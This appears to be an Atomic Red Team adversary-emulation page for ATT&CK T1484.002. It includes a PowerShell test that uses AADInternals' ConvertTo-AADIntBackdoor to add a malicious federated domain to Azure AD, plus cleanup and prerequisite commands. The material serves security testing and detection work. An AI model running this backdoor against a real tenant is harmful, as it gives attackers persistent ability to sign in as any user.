T1484.002

Domain Trust Modification

Description from ATT&CK

Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.

Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge SAML Tokens, without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain)

Atomic Tests

Atomic Test #1 - Add Federation to Azure AD

Add a new federated domain to Azure AD using PowerShell. The malicious domain to be federated must be configured beforehand (outside of the scope of this test): 1. Open Azure Portal 2. Add a new "custom domain name" 3. Verify the domain by following instructions (i.e. create the requested DNS record)

Supported Platforms: azure-ad

auto_generated_guid: 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7

Inputs:

Name	Description	Type	Default Value
azure_username	Username of a privileged Azure AD account such as External Identity Provider Administrator or Global Administrator roles	string	bruce.wayne@contosocloud.com
azure_password	Password of azure_username	string	iamthebatman
domain_name	Malicious federated domain name	string	contoso.com

Attack Commands: Run with powershell!

Import-Module AzureAD
Import-Module AADInternals

$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword

try {
  Connect-AzureAD -Credential $Credential -ErrorAction Stop > $null
}
catch {
  Write-Host "Error: AzureAD could not connect"
  exit 1
}

try {
  $domain = Get-AzureADDomain -Name "#{domain_name}"
}
catch {
  Write-Host "Error: domain ""#{domain_name}"" not found"
  exit 1
}
if (-Not $domain.IsVerified) {
  Write-Host "Error: domain ""#{domain_name}"" not verified"
  exit 1
}

if ($domain.AuthenticationType -eq "Federated") {
  Write-Host "Error: domain ""#{domain_name}"" already federated. Try with a different domain or re-create it before."
  exit 1
}

$at = Get-AADIntAccessTokenForAADGraph -Credentials $Credential
if (-Not $at) {
  Write-Host "Error: AADInternals could not connect"
  exit 1
}

$new = ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "#{domain_name}"
if ($new) {
  Write-Host "Federation successfully added to Azure AD"
  Write-Host $new
}
else {
  Write-Host "The federation setup failed"
}

Write-Host "End of federation configuration."

Cleanup Commands:

try {
  Import-Module AzureAD -ErrorAction Ignore

  $PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
  $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
  Connect-AzureAD -Credential $Credential -ErrorAction Ignore > $null

  Remove-AzureADDomain -Name "#{domain_name}" -ErrorAction Ignore
} catch {}

Dependencies: Run with powershell!

Description: AzureAD and AADInternals Powershell modules must be installed.

Check Prereq Commands:

if ((Get-Module -ListAvailable -Name AzureAD) -And (Get-Module -ListAvailable -Name AADInternals)) {exit 0} else {exit 1}

Get Prereq Commands:

Install-Module -Name AzureAD -Force
Install-Module -Name AADInternals -Force

source

Twitter Facebook LinkedIn